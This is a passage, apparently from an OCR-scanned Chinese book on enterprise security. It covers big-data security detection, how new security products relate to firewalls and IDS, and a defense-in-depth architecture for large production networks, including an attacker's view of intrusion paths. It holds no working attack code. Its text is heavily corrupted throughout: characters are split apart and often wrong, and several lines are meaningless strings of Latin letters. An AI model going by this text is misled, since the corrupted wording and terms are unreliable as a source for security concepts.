Hadoop/Storm 和 集群 时 从 采集 存储 到 计算 这 套 技术 架构 本 身 所 涉及 的 安全 


问题 。 
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图 4-1 大 数据 包含 很 多 概念 
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第 二 类 ， 以 海量 样本 + 机 器 学 习 的 方法 去 处 理 安全 检测 问题 ， 这 里 
的 大 是 指 样本 数量 大 ， 以 试图 获得 比 固定 样本 + 精确 匹配 算法 更 接近 事 
实 的 精准 判断 率 ， 例 如 360 的 QVM 引 擎 号 称 在 云端 存储 20 亿 用 于 检测 恶 
意 代 码 的 样本 ， 用 以 区 别传 统 的 特征 检测 。 这 一 类 理论 上 最 接近 大 数据 
的 原生 概念 ， 但 是 能 不 能 做 得 比 传统 方法 更 好 ， 也 是 很 有 挑战 的 。 


第 三 类 ， 由 于 要 处 理 的 数据 量 比较 大 ， 传 统 的 单机 设备 处 理 不 了 ， 
所 以 需要 用 Hadoop 之 类 的 技术 解决 数据 处 理 中 的 数据 规模 和 实时 性 要 求 
这 两 个 性 能 问题 ， 但 本 质 还 是 传统 BI 的 建 模 方法 ， 解 决 的 也 是 一 个 传统 
问题 。 当 下 大 多 数 属 于 这 一 类 ， 既 然 只 是 一 个 纯粹 的 性 能 问题 ， 在 有 大 
数据 支持 团队 的 情况 下 ， 有 价值 的 部 分 主要 还 在 于 建 模 的 规则 部 分 ， 即 





对 安全 问题 的 检测 规则 。 


对 于 第 二 类 ， 样 本 数量 、 数 据 采 集 点 、 采 集 渠 道 是 其 核心 竞争 力 ， 
所 以 越 早 开始 积累 数据 ， 越 早 形成 大 数据 ， 便 形成 了 优势 的 壁垒 。 而 对 
于 第 三 类 ， 积 累 数 据 的 多 少 则 无 所 谓 ， 构 成 其 能 力 的 关键 还 是 看 规则 的 
健全 程度 。 


第 三 类 是 目前 企业 安全 建设 中 实践 最 多 的 方案 ， 大 多 数 还 是 用 自己 
产生 的 数据 解决 自己 的 安全 问题 ， 即 用 VM1 产 生 的 系统 网 络 数 据 检测 
VM1 的 安全 状态 ， 而 不 是 用 VM2 产 生 的 系统 网 络 数 据 检测 VM1 的 安全 
状态 ， 也 很 少 用 VM1、VM2、VM3......VMx 产 生 的 全 局 数据 检测 VM1 
的 安全 状态 ， 尽 管 也 有 全 局 规则 ， 但 实际 效果 上 占 比 较 少 。 





在 甲 方 安全 团队 的 实际 工作 中 ， 第 二 类 问题 主要 留 给 AV 和 APT 广 
商 ， 以 购买 商业 产品 的 方法 获得 ， 并 且 场 景 主要 在 办 公 网 络 ， 对 于 比较 
大 的 互联 网 公司 ， 也 有 将 机 器 学 习 用 于 Web 安 全 和 业务 层面 的 ， 而 对 于 
目 己 动手 建设 的 部 分 更 多 聚焦 于 第 三 类 方案 ， 主 要 针对 生产 网 络 。 








2. 传 统 场景 和 大 型 互联 网 场景 


在 传统 安全 场景 下 如 图 4-2 所 示 ) 通过 采集 各 个 终端 安全 软件 的 
告警 、 日 志 ， 各 个 网 络 设 备 、 安 全 设备 的 日 志 告警 到 一 个 数据 产 ， 用 大 
数据 进行 多 维度 关联 ， 最 后 展现 告警 ， 总 体 上 用 了 一 次 大 数据 计算 。 
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图 4-2 ”传统 的 安全 场景 


而 在 大 型 互联 网 下 终端 可 能 不 直接 告警 〈 如 图 4-3 所 示 ) ， 而 是 以 
采集 数据 为 主 ， 在 每 一 个 维度 的 安全 解决 方案 上 都 会 有 目 己 的 大 数据 环 
境 ， 即 单 点 的 安全 监测 手段 全 部 大 数据 化 ， 通 过 第 一 次 大 数据 计算 在 自 
己 的 纵 同 层次 (例如 主机 入 侵 检测 ) 上 产生 告警 ， 而 关联 分 析 则 会 在 利 
用 第 一 次 大 数据 计算 结果 的 基础 上 提供 第 二 次 大 数据 计算 产生 更 多 的 信 
恩 。 是 任 在 单 维度 上 需要 用 到 大 数据 计算 环境 ， 取 决 于 IDC 规 柑 、 数 据 
量 是 否 足 够 大 ， 不 大 的 情况 下 关系 型 数据 库 + 黑 日 规则 也 可 以 胜任 ， 而 
很 大 的 时 候 往 往 需 要 用 到 大 数据 和 机 器 学 习 。 
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图 4-3 ”大 型 互联 网 的 环境 


4.2 解决 方案 的 争议 


整个 产业 处 于 变革 时 期 ， 安 全 理念 和 技术 形态 都 在 不 断 进 步 。 有 进 
取 心 的 安全 三 商 在 推出 新 的 解决 方案 的 同时 ， 也 有 坚 不 留情 地 指出 了 过 去 
产品 的 弱点 ， 例 如 在 APT 面 世 的 时 候 提 出 IDS 死 亡 了 ， 在 威胁 情报 出 炉 
的 时 候 提 出 防火 墙 、IPS 等 “ 老 三 样 "过 时 了 ， 也 有 些 人 预言 防火 增 会 消 
亡 之 类 的 。 


安全 厂商 这 么 说 虽然 显得 激进 ， 但 每 一 个 时 代 的 广告 不 都 这 样 么 ， 
无 论 如 何 都 不 能 算 错 。 对 于 甲 方 的 安全 人 员 来 说 ， 如 果 你 把 原 有 的 解决 
方案 体系 全 部 排除 在 外 ， 只 选择 新 兴 类 型 的 APT、 威 胁 情报 、 大 数据 类 
安全 产品 ， 会 如 何 ? 显然 无 法 解决 现 有 环境 中 的 大 部 分 问题 。 新 兴 的 解 
决 方案 和 原来 的 安全 措施 本 质 上 是 演进 、 升 级 和 补充 的 关系 ， 不 是 符 代 
的 关系 。 





OWASP 的 崛起 跟 互 联网 Web 服 务 的 大 范围 应 用 有 很 大 的 联系 ， 但 
在 某 种 意义 上 跟 防 火 墙 这 个 古老 的 安全 产品 也 有 撤 不 了 的 关系 。 越 来 越 
多 的 管理 员 有 了 安全 意识 之 后 ， 很 多 站 点 只 开放 了 80 端 口 ， 应 用 层面 的 
威胁 对 抗 成 了 主 战场 ， 防 火 墙 对 于 减少 攻击 面 起 了 非常 大 的 作用 。 男 一 
方面 随 着 缓冲 区 溢出 类 内 存 破坏 缓解 措施 的 成 熟 ， 二 进 制 利用 的 难度 越 
来 越 高 ， 应 用 入 口 成 了 木 桶 理论 的 短 板 ， 也 就 是 最 容易 下 手 的 点 ， 这 是 








攻防 技术 双方 演进 后 的 一 个 状态 ， 友 应 的 是 当前 的 时 间 点 下 Web 应 用 安 
全 热门 的 原因 ， 但 这 并 不 会 是 一 个 常态 。 随 着 RASP 等 相关 技术 的 成 
熟 ， 对 抗 的 战场 还 会 发 生 进 一 步 的 变化 ， 趋 势 古 一 个 动态 变化 的 过 程 。 


防火 增 会 消亡 么 ?这 玩意 儿 其 实 跟 阿 司 匹 林 一 样 ， 新 药 虽 然 一 直 在 
不 断 间 世 ， 但 是 阿司匹林 长 久 不 衰 。 很 多 人 觉得 防火 场 这 玩意 儿 没 什么 
价值 量 ， 但 不 代表 它 没 有 价值 ， 防 火 增 的 最 根本 作用 是 减 小 攻击 面 ， 而 
不 是 为 了 解决 反弹 木马 这 样 的 问题 。 觉 得 没有 价值 量 是 因为 人 们 已 经 对 
其 非常 习惯 了 ， 束 好 像 出 门 穿 衣 服 要 先 穿 内 裤 一 样 变 成 了 大 多 数 人 的 一 
种 常识 。 在 常年 罕 月 中 的 积累 使 得 学 习 和 轰 驶 的 边际 成 本 递减 ， 很 容易 
获取 和 上 手 ， 所 以 大 家 都 没 太 看 重 它 ， 但 是 它 的 价值 是 由 “假如 没有 防 
火 墙 ?这 一 命题 来 决定 的 。 如 采 现 在 线 上 的 系统 都 一 下 子 去 掉 防 火 墙 会 
如 何 ， 所 有 Linux 内 核 中 的 netfilter 都 不 加 载 任何 规则 ， 现 实 中 的 安全 状 
况 会 “一 夜 回 到 解放 前 ”，OWASP 的 地 位 甚至 会 倒退 。 有 人 和 觉得 没 防火 
首 也 无 所 谓 ， 把 不 必要 的 服务 全 停 了 就 行 了 。 确 实 ， 如 果 只 有 一 人 台 机 需 
你 可 以 那么 于， 如 宋 是 一 个 复杂 生产 网 络 的 成 千 上 万 的 服务 器 ， 归 属于 
世界 各 地 的 IDC， 资 产 附属 同一 组 织 中 不 同 的 admin 管 理 ， 变 更 完全 不 
受 控 ， 没 有 防火 墙 会 如 何 ? AAA eal Aas SE 








如 末 以 前 的 产品 和 解决 方案 会 被 代 亚 最 大 的 可 能 性 是 因为 它 的 “ 投 
入 产 出 比 不 那么 高 了 ”， 所 以 新 的 解决 方 采 即便 是 技术 上 跨 维 度 苋 搜 ， 
想 蔡 代 老 的 解决 方案 必须 做 到 这 一 点 。 比 如 NIDS 是 一 个 全 类 型 协议 分 


析 器 ，WAF 实 际 上 可 以 看 成 是 一 个 以 HTTP (s) 协议 为 主 的 

NIDS (NIPS) ， 但 如 果 在 Web 服 务 为 主 的 生产 网 络 里 ， 除 
HTTP/HTTPS 以 外 的 协议 都 在 边界 锐 防 火 墙 过 小 了， 在 这 种 场景 下 ， 部 
署 IDS (IPS)〉 的 价值 就 不 是 那么 大 ， 相 较 而 言 ，WAF 对 HTTP 协 议 拥 有 
更 强 的 检测 能 力 ，NIDS、NIPS 的 价值 量 在 这 里 显得 比较 小 ， 因 此 在 总 
预算 固定 且 不 富余 的 情况 下 ，WAF 完 全 可 以 替代 NIPS。 大 数据 的 解决 
方案 什么 时 候 可 以 蔡 换 原来 的 解决 方案 : 实现 原来 所 有 的 检测 维度 和 检 
测 深度 ， 拥 有 更 高 的 检 出 率 ， 这 个 时 候 可 以 说 选择 老 的 解决 方案 已 经 彻 
底 没 价值 ， 新 的 产品 会 完全 取代 老 的 产品 形态 ， 但 在 没有 做 到 这 一 点 之 
前 ， 仍 然 是 两 者 共存 的 状态 。 


























在 当下 的 安全 产业 ， 新 概念 层出不穷 ， 但 有 很 多 属于 旧 酒 装 新 并 
换 汤 不 换 药 。 概 念 变 了 ， 实 操 层 面 扩展 或 者 优化 了 一 点 ， 但 本 质 没 变 。 
如 果 被 概念 所 迷惑 ， 安 全 工作 就 会 进入 死胡同 。 尤 其 是 安全 行业 的 后 来 
者 ， 如 果 没 有 搞 清楚 某 项 安全 技术 的 起 源 是 为 解决 什么 问题 的 ， 而 被 一 
堆 高 大 上 的 概念 名 词 所 吸引 ， 甚 至 把 厂商 用 来 营销 的 软文 当成 技术 学 习 
的 范本 ， 就 会 跌 入 坑 中 。 在 解决 实际 的 问题 上 ， 低 成 本 、 简 单 甚至 无 脑 
的 手段 只 要 能 解决 问题 就 好 ， 高 大 上 的 东西 并 不 见得 一 定 “管用 *、“ 好 
AP. 
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第 5 革 ”防御 染 构 原则 


本 章 从 通用 和 全 局 的 角度 介绍 一 下 防御 体系 架构 的 设计 方法 。 


5.1 防守 体系 建设 三 部 曲 


攻防 对 抗 主 要 是 三 个 层面 的 对 抗 : 信息 对 抗 、 技 术 对 抗 、 运 营 能 力 
对 抗 ， 如 果 我 们 在 这 三 个 层面 可 以 做 到 趋 于 完美 ， 那 么 防守 体系 趋 于 固 
FEAL Ae A AGEN o 


1. 信 息 对 抗 
言 思 对抗 的 目的 是 知己 知 币 ， 从 两 方面 进行 : 数据 化 和 社会 化 。 


数据 化 指 的 是 企业 自 映 安全 风险 数据 建设 与 分 析 ， 需 要 根据 基线 数 
据 、 拓 扑 数据 、 业 务 数据 梳理 清楚 可 能 存在 的 攻击 路 径 与 攻击 面 ， 针 对 
性 设防 。 攻 击 者 得 手 的 原因 往往 并 非 我 们 没有 设防 ， 而 是 不 清楚 存在 哪 
些 攻击 面 与 路 径 。 同 时 需要 注意 的 是 ， 这 些 数据 是 动态 变化 的 ， 需 要 持 
续 运 营 ， 对 于 业务 环境 变更 带 来 的 新 的 攻击 面 与 路 径 需 要 及 时 补 防 ， 往 
往 丝 漏 也 出 现在 对 业务 变更 跟 进 不 够 及 时 的 情况 下 。 





2. 技 术 对 抗 





在 攻防 技术 对 抗 方面 ， 业 界 通常 是 一 片 亚 观 情绪 ， 认 为 防守 方 总 是 
处 于 劣势 。 在 通用 的 安全 技术 方面 确实 如 此 ， 因 为 防守 者 面 对 的 是 一 个 
开放 性 的 安全 防御 难题 ， 建 设 的 防御 体系 往往 如 同 “ 马 其 谨防 线 ” 一 样 被 


攻击 者 绕 开 。 


但 如 果 我 们 的 防守 体系 解决 的 是 一 个 相对 固定 的 企业 和 业务 ， 或 者 
说 根据 前 述 信 息 对 抗 环 市 中 梳理 出 清晰 的 防守 环节 ， 那 么 我 们 的 防守 体 
系 是 可 以 做 到 闭环 的 。 


在 攻防 技术 维度 ， 单 点 设防 的 方式 往往 让 防守 者 陷入 疲 于 应 付 的 境 
地 。 但 战场 在 我 们 的 地 盘 ， 不 需要 与 对 手 在 同一 个 维度 作成 ， 针 对 攻击 
者 ， 每 个 突破 点 可 以 在 更 高 维度 以 及 多 维度 进行 检测 与 防守 ， 这 才能 扭 
转 攻防 的 现势 。 








所 以 诸如 HIDSAPI hook 于 命令 注入 和 系统 横向 渗透 ，RASP 于 Web 
漏洞 ， 行 为 监测 模型 于 0day 攻 击 ， 是 我 们 扭转 攻防 优势 的 手段 。 





方案 有 了 ， 接 下 来 就 是 工程 能 力 ， 把 方案 落地 优化 才能 有 最 终 的 效 
果 。 这 包括 代码 能 力 、 海 量 数据 运营 、 规 则 的 优化 。 特 别 是 在 BAT 这 类 
超大 型 网 络 中 ， 往 往 决 定 效 果 的 不 是 攻防 技术 ， 工 程 化 反而 成 了 压 垮 安 
全 项 目的 最 后 一 根 稳 草 。 项 目 失 败 就 不 要 提 什 么 防守 体系 建设 了 。 
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3. 运 营 能 力 对 抗 





貌似 技术 做 好 了 ， 防 守 体系 应 该 完美 了 ? 并 非 如 此 ! 据 统 计 ， 在 所 
有 未 能 阻 断 和 发 现 的 入 侵 案 例 中 ， 仅 有 1/3 不 到 是 因为 诸如 0 day 漏 洞 等 
技术 原因 ， 那 么 剩 下 的 一 半 是 系统 故障 ， 另 一 半 是 运营 工作 没 跟 上 。 








运营 能 力主 要 体现 在 两 方面 : 


1) 风险 闭环 。 简 单 说 就 是 “一 个 问题 不 能 犯 两 次 ”， 通 过 闭环 运营 
让 企业 自身 安全 能 力 不 可 逆 地 走向 更 好 。 


2) 执行 力 。 这 涉及 管理 方面 ， 就 不 细 说 了 。 


让 我 们 总 结 一 下 ， 防 守 体 系 建设 三 部 曲 如 图 5-1 所 示 。 


信息 对 抗 






知己 知 彼 
情报 优势 


运营 能 力 对 抗 














图 5-1 防守 体系 建设 三 部 曲 


5.2 ”大 规模 生产 网 络 的 纵深 防御 架构 
5.2.1 互联 网 安全 理念 


纵深 防御 这 个 词 在 安全 行业 被 用 得 很 伴 了 ， 乙 方 的 顾问 写 方案 时 信 
手 担 来 ， 我 想 很 多 人 的 理解 可 能 并 不 一 致 。 其 实 我 比较 赞同 腾讯 的 “ 河 
防 ?以 及 数字 公司 用 的 “ 搭 防 ”的 概念 ， 这 些 比较 贴近 实际 。 下 面 展开 的 
主题 限定 在 大 规模 生产 《对 外 服务 ) 网 络 而 不 是 办 公 网 络 。 当 下 各 安全 
公司 都 偏爱 APT 和 大 数据 威胁 情报 之 类 的 概念 ， 在 办 公 网 络 我 想 这 些 是 
他 们 圈 地 运动 的 战场 ， 不 过 在 生产 网 络 中 似乎 仍然 遥远 。 目 动 化 运 维 的 
交互 模型 跟 大 幅度 人 机 操作 的 办 公 网 络 完全 不 同 ， 而 且 现在 号 称 机 器 学 
习 的 方法 在 实 操 中 表现 得 很 一 般 ， 效 果 不 如 对 攻防 模型 抽象 后 定义 规则 
的 方式 。 这 里 并 不 是 在 否定 机 器 学 习 的 方法 ， 只 是 表达 离 成 熟 还 疝 有 距 


E 


[A o 











先 说 一 下 互联 网 安全 的 一 些 理念 性 的 东西 ， 没 有 漏洞 是 不 可 能 的 ， 
互联 网 退 求 快速 交付 ， 把 安全 做 得 太 厚 重 是 “不 满足 业务 需求 的 "， 为 退 
求 极致 的 低 缺 陷 率 而 大 幅 增加 发 布 成 本 是 不 切实 际 的 。 但 是 互联 网 安全 
有 几 个 比较 核心 的 需求 : 快速 检测 、 有 限 影响 、 快 速 溯源 、 快 速 恢 复 

通俗 解释 一 过 就 是 :允许 带 着 一 些 问题 上 线 ， 但 是 有 bug 或 入 侵 时 安 
全 人 士 能 快速 检测 到 而 不 是 处 于 无 知 无 党 的 状态 ， 就 算 发 生 了 攻击 或 入 

















侵 ， 安 全 人 士 能 做 到 使 入 侵 者 所 获取 的 权限 和 造成 的 影响 尽 可 能 的 小 ， 
并 且 安 全 人 士 有 途径 或 快照 还 原 入 侵 过 程 做 根 因 分 析 ， 安 全 事件 能 在 基 
本 不 影响 业务 的 情况 下 恢复 到 健康 状态 。 当 然 ， 这 个 话题 也 太 大 ， 本 扁 
只 讨论 其 中 天 于“ 有限 影响 ”的 部 分 。 








5.2.2 ”攻击 者 视角 


在 谈 及 防御 之 前 先 以 攻击 者 的 视角 看 一 下 攻击 路 径 ， 如 图 5-2 所 





图 5-2 ”渗透 路 径 思 维 导 图 








Plan-A: 通常 路 径 ， 从 目标 系统 正面 找 漏 洞 ， 远 程 直 接 rootshell 在 
现代 基本 没有 了 ， 大 多 数 是 以 应 用 为 入 口 ， 先 获取 上 层 应 用 的 权限 ， 然 


后 通过 上 传 webshell 等 方式 间接 获得 系统 shell， 最 后 提 权 获得 rootshell， 
后 面 继续 扩大 战果 的 事情 就 不 担 了 ， 安 全 建设 的 思路 上 自然 是 要 反 过 来 ， 
阻止 攻击 者 扩大 战果 。 


Plan-B: 如 果 正 面 没 有 明显 可 利用 的 漏洞 ， 就 再 要 曲 打 迁 回 ， 从 周 
围 信 任 域 开 始 下 手 ， 这 个 信任 域 是 广义 上 的 ， 包 括 可 arp 重 定 癌 的 、 可 
虽 探 的 、 可 会 话 中 间 人 的 、 可 链 路 劫持 的 、 相 同 内 网 的 、 密 码 满足 同一 
规律 的 、 互 联 互通 信任 关系 的 ， 灾 备 或 镜像 站 点 等 ， 获 取 一 个 点 后 再 折 
返 ， 之 后 的 路 径 与 A 类 似 。 








Plan-C: 如 条 直 接 针 对 生产 网 络 不 行 ， 就 需要 考虑 社会 工程 学 了 。 
针对 管理 员 和 共 公 网 络 的 APT， 水 坑 攻 击 ， 针 对 应 用 后 合 管理 员 的 社会 
工程 学 技巧 ， 搞 定 SA 目 然 也 就 搞定 了 所 有 服务 器 。 








5.2.3 ”防御 者 模型 


安全 建设 是 反 入 侵 视 角 ， 针 对 攻击 活动 中 的 每 一 步 “ 埋 点 ”， 埋 点 的 
离 意 在 于 我 假设 攻击 者 到 了 这 一 步 ， 我 要 阻止 他 进入 下 一 步 ， 或 者 不 能 
市 着 完全 的 火力 进入 下 一 步 还 能 全 身 而 退 。 当 然 ， 这 里 只 针对 有 限 影 
啊 ， 入 侵 检测 之 类 的 内 容 这 里 先 不 展开 ， 后 续 会 有 专门 的 介绍 。 图 5-3 
古 一 个 纵深 防御 体系 的 示例 。 


纵深 防御 体系 


Bij ib ie 
防止 内 核 空间 乱入 DEP&ASLR, StackCanay, SELinux 


OS 层 防 御 和 提 权 


Container 层 安 全 


Jvm/Zend hook API, Nginx tomcat 加 固 


WAF (防止 SQL, inj, XSS, CSR 等 ) 


L3 ACL, L4 Netfilter 


端口 协议 过 滤 


VPC/VxLan/Vlan 


业务 视角 划分 安全 等 级 





图 5-3 ”纵深 防御 体系 示例 





第 一 层 是 安全 域 划分 ， 这 个 安全 域 是 对 业务 的 抽象 ， 并 不 是 对 物理 
服务 器 的 划分 ， 在 大 规模 分 布 式 架构 中 ， 同 一 个 安全 域 的 机 器 可 能 并 不 
-定位 于 同一 个 物理 机 房 ， 但 是 它们 对 应 相同 的 安全 等 级 ， 共 至 一 组 相 
同 的 访问 控制 集 略 ， 只 对 其 他 安全 域 或 Internet 穴 露 有 限 的 协议 和 接口 。 
即使 攻击 者 渗透 了 其 他 相 邻 的 服务 器 ， 也 只 能 扫描 和 访问 这 个 安全 域内 
有 限 的 几 个 端口 ， 没 办 法 目 由 渗透 ， 这 个 方案 主要 解决 Plan-B 曲 线 救国 
时 被 入 侵 者 “误伤 ”” 即 被 无 意识 的 扫描 行为 以 很 低 的 成 本 获取 新 的 站 后 
和 权限 ， 以 及 获得 单 点 root 后 进一步 渗透 的 扩散 ， 希 望 能 把 安全 事件 爆 
发 的 最 大 范围 抑制 在 一 个 安全 域 中 ， 而 不 是 直接 扩散 到 全 网 。 

















二 层 是 基于 数据 链 路 层 的 隔离 ， 只 有 第 二 层 隅 离 了 才能 算 真 正 隔 
离 ， 否 则 只 在 第 3 层 以 上 做 ACL 效 果 会 差 一 些 ， 仍 然 会 遭受 ARP 攻 击 。 
第 二 层 使 用 VPC、Vxlan、Vlan 等 方法 相当 于 在 安全 域 的 基础 上 对 一 
服务 器 以 更 细 的 粒度 再 画 一 道 防 线 ， 进 一 步 抑制 单 点 沦陷 后 受害 源 扩大 
的 问题 。 在 不 是 特别 大 的 网 络 中 可 以 直接 跳 过 安全 域 到 这 一 步 。 当 然 安 
全 域 的 概念 在 任何 时 候 都 是 存在 的 ， 我 们 在 这 里 仅仅 是 在 做 划分 的 事 


情 。 











第 二 层 之 上 就 是 端口 状态 协议 过 滤 ， 这 是 绝 大 多 数 “ 防 火 墙 " 应 用 的 
场景 。 解 决 的 还 是 对 黑客 暴露 的 攻击 面 的 问题 ， 即 使 我 的 加 固 做 得 不 到 
位 ， 不 必要 的 服务 没有 清理 干净 ， 开 放 了 有 问题 的 端口 ， 甚 至 有 些 端口 
上 跑 着 的 服务 还 有 漏洞 ， 但 是 因为 被 防火 墙 过 滤 了 ， 路 由 不 可 达 ， 所 以 
攻击 者 利用 不 了 ， 他 只 能 在 对 外 或 对 信任 域 暴 露 的 端口 上 去 想 办 法 。 本 
质 上 ， 就 是 给 攻击 者 提供 “窄带 ”， 有 限 的 访问 通道 。 不 过 在 有 复杂 髓 套 
引用 关系 的 大 规模 生产 网 络 中 ， 出 于 运 维 成 本 的 考虑 ， 有 时 候 访 问 控制 
策略 不 会 做 得 很 细 粒 度 ， 因 为 那样 的 话 ， 如 果 有 台 机 器 挂 了 ， 换 个 IP 都 
麻烦 ， 这 也 是 安全 向 业务 的 妥协 。 














i 
平日 的 工作 都 是 聚焦 于 哪 层 。 这 一 层 单独 拆 开 都 可 以 再 建 一 个 纵深 防御 
的 子 体系 。 应 用 层 通常 是 暴露 在 Internet 上 的 攻击 面 ， 这 一 层 主要 是 解决 
认证 鉴 权 、 注 入 跨 站 上 传 之 类 的 应 用 层 漏 洞 ， 尺 可 能 把 入 侵 者 墙 在 信息 














和 资源 的 唯一 入 口 。 如 果 你 在 开发 WAF， 那 你 对 应 的 也 是 这 一 层 的 工 
作 。 





应 用 层 上 方 是 容器 、 运 行 时 环境 。 这 里 的 目标 是 假设 服务 器 上 的 应 
用 程序 有 漏洞 ， 且 攻击 者 找到 了 漏洞 ， 我 不 希望 这 个 漏洞 能 被 成 功利 
用 ， 直 接 跳 转 到 系统 权限 ， 而 是 希望 能 在 这 一 步 阻 止 攻击 者 ， 办 法 就 是 
通过 容器 加 固 。 比 如 阻止 一 些 危险 函数 的 运行 ， 比 如 上 传 了 webshell 但 
是 不 被 解析 执行 ， 比 如 你 想 执行 eval () 并 用 种 种 方法 变形 编码 字符 串 
拼接 逃 过 了 应 用 层 的 检测 ， 但 是 到 了 运行 时 其 实 是 相同 的 底层 指令 ， 那 
么 无 论 攻击 者 在 上 层 多 么 努力 地 变形 ， 我 都 有 可 能 在 更 底层 把 攻击 者 揪 
出 来 ， 哪 怕 不 直接 阻 断 ， 我 也 至 少 报 个 警 。 在 绝 大 多 数 入 侵 活动 中 ， 上 
传 或 生成 webshell 是 从 应 用 权限 向 系统 权限 转化 的 关键 一 步 ， 所 以 这 一 
层 的 防御 也 是 比较 重要 的 。 后 面 会 有 单独 篇 幅 讲 如 何 对 抗 webshell。 








如 果 不 幸 之 前 的 步骤 都 没 阻 止 攻 击 者 ， 对 方 已 经 得 到 了 普通 用 户 的 
shell"$"， 那 么 我 肯定 不 希望 你 继续 得 到 rootshell， 对 抗 的 办 法 就 是 大 家 
常见 的 那些 系统 加 固 项 。 有 很 多 文章 洋洋 洒洒 写 了 一 大 堆 主 要 就 是 用 在 
这 个 场景 的 ， 不 过 最 主要 的 还 是 对 抗 本 地 提 权 以 及 内 核 提 权 ， 攻 击 免疫 
或 称 攻击 缓解 机 制 如 SMEP、SMAP、DEP、 各 种 ASLR、stack-canay、 





read-only、PLT、GOT 等 都 是 在 这 里 * 埋 点 ”， 其 他 的 诸如 umask=022 等 
也 是 在 这 里 埋 点 。 似 乎 看 上 去 这 些 不 太 需 要 安全 团队 的 介入 ， 好 像 都 是 
OS 默认 的 机 制 ? 其 实 不 然 ， 安 全 做 到 偏执 的 程度 后 还 是 有 自己 出 手 的 





地 方 ，Android 出 手 比 标准 的 Linux 更 快 一 点 ， 也 许 以 后 就 真 的 没 太 多 需 
要 自己 出 手 的 地 方 了 。 不 过 ， 当 下 各 种 基于 LXC 的 容器 ， 越 来 越 多 的 多 
租户 的 云 环境 ， 隔 离 的 机 制 完全 依赖 于 内 核 的 健壮 性 ， 这 些 场 景 下 对 抗 
这 一 层 的 攻击 都 显得 尤为 重要 。 

















如 果 被 拿 走 了 root 自 然 是 很 令 人 不 爽 的 事 ， 但 还 不 是 最 令 人 不 吏 
的 。 如 有 果 有 一 天 当 你 的 1 万 台 服 务 器 中 有 500 台 被 攻击 了 ， 而 且 还 不 能 推 
WEDER J kernel rootkit 的 情况 下 ， 这 种 感觉 是 最 要 命 的 。 束 如 同 你 
生 了 个 肿瘤 手术 摘 掉 也 就 算 了 ， 如 果 手 术 完 都 不 确定 摘 了 没有 ， 可 就 胀 
类 了， 这 时 即便 500 台 服务 右 备 份 数 据 、 重 装 系 统 都 不 能 彻底 解决 问 
题 ， 而 且 近 似 于 你 某 个 子 业务 要 处 于 离线 状态 ， 对 于 这 种 极其 影响 可 用 
性 的 事情 ， 业 务 部 门 会 把 你 逼 疾 掉 。 所 以 不 是 特别 需求 要 干掉 
LKM、/dewkmem 并 限制 /devwmem 的 全 地 址 空间 读 写 ， 另 外 kernel MAC 
内 核 强 制 访问 控制 也 能 限制 root 只 能 做 有 限 的 事情 ， 尽 管理 论 上 内 核 提 
权 还 是 能 控制 一 切 ， 不 过 要 在 没有 开发 环境 的 服务 器 上 实现 完整 的 
kernel rootkit 功 能 并 保证 不 在 用 户 态 留 下 蛛丝马迹 的 概率 还 是 比较 低 。 
这 样 做 还 有 一 个 好 处 ， 把 入 侵 检 测 聚 焦 于 用 己 态 ， 不 要 动不动 就 去 装 一 
堆 内 核 级 别 的 重量 级 玩意 儿 ， 大 规模 高 并 发 的 生产 环境 伤 不 起 。 

















在 云 计 算 环 境 中 ， 上 面 那 步 可 能 还 不 算是 单 点 渗透 的 终结 ， 更 底层 
WA hypervisor. WRIA VER VM Aa ERR BEN) A 
要 考虑 一 下 VMM 的 保护 方案 ， 现 在 hypervisor 这 一 层 很 薄 ， 不 会 做 得 很 





重 ， 似 乎 还 没有 特别 成 熟 和 通用 的 方案 ， 不 过 肯定 会 友 展 起 来 ， 会 有 更 
多 类 似 于 XSM 这 样 的 方案 。 


在 一 个 真正 建立 纵深 防御 的 系统 中 ， 入 侵 者 一 般 到 不 了 root 这 一 步 
就 会 被 揪 出 来 ， 只 不 过 完整 的 纵深 防御 分 散在 全 书后 续 的 篇 幅 里 ， 这 里 
只 是 选取 了 其 中 一 个 维度 来 试图 解读 这 个 概念 。 男 一 方面 ， 完 整 的 纵深 
防御 体系 只 有 大 型 互联 网 公司 才 可 能 全 和 窗 盖 ， 因 为 跟 安全 建设 成 本 有 
天， 这 个 问题 之 前 提 人 到 过 : 不 同 规模 企业 的 安全 需求 和 同一 公司 在 不 同 
安全 建设 阶段 的 需求 是 不 一 样 的 。 








5.2.4 ”互联 网 安全 架构 设计 原则 


1. 纵 深 防 御 





整个 企业 的 安全 架构 是 由 多 层次 的 安全 域 和 对 应 的 安全 机 制 构成 
的 ， 要 保护 关键 数据 ， 需 要 层 层 设防 ， 层 层 包 围 ， 这 样 就 不 太 可 能 被 攻 
击 者 得 手 一 点 就 全 部 失守 。 








从 产品 设计 层面 来 讲 ， 即 使 软件 依赖 的 外 层 系统 安全 机 制 破坏 时 ， 
仍然 能 保障 应 用 自身 数据 的 安全 性 ， 例 如 在 iOS 越 狱 的 环境 下 ， 系 统 沙 
箱 失 效 而 应 用 的 数据 使 用 自 加密 。 在 HITPS 被 劫持 的 状态 下 ， 仍 然 能 保 
证 post 数 据 中 的 敏感 信息 难以 破解 。 


2. 多 维 防御 


对 同一 种 攻击 有 多 种 维度 的 防御 和 检测 手段 ， 逃 过 一 层 还 有 额外 机 
制 ， 例 如 ， 对 抗 SQL 注 入 ， 第 一 层 WAF， 第 二 层 Web 日 志 分 析 ， 第 三 层 
RASP， 第 四 层 SQL 审 计 。 


叉 壁 如 从 SDL 环 市 来 看 多 维 : 防御 漏洞 第 一 层 是 豆 态 代码 扫描 ， 第 
二 层 是 编译 过 程 ， 第 三 层 是 运行 时 保护 ， 确 保 的 是 当 其 中 一 层 失效 时 还 
不 至 于 功 亏 一 筑 。 











3. 降 维 防御 


降 维 防御 是 针对 降 维 攻击 而 言 的 ， 大 意 是 在 攻击 者 不 可 达 、 不 可 
控 、 无 感知 的 更 底层 进行 检测 和 拦截 。 例 如 在 内 核 态 检测 用 户 态 攻击 ， 
使 用 RASP 在 运行 时 而 不 是 在 cgi 层 面 检测 webshell，HIDS 的 攻击 检测 不 
在 本 机 判定 ， 而 是 在 云端 计算 ， 入 侵 者 对 其 无 感知 。 





4. 实 时 入 侵 检 测 





实时 入 侵 检 测 偏重 的 是 事 中 进行 时 的 检测 能 力 而 不 是 事后 的 指标 。 
大 规模 IDC 下， 例如 10 万 多 台 服 务 嚣 规模 仍然 能 做 到 30 分 钟 以 内 即时 告 
警 ， 对 正在 进行 中 的 入 侵 活动 实时 发 现 ， 例 如 攻击 者 刚 上 传 了 webshell 
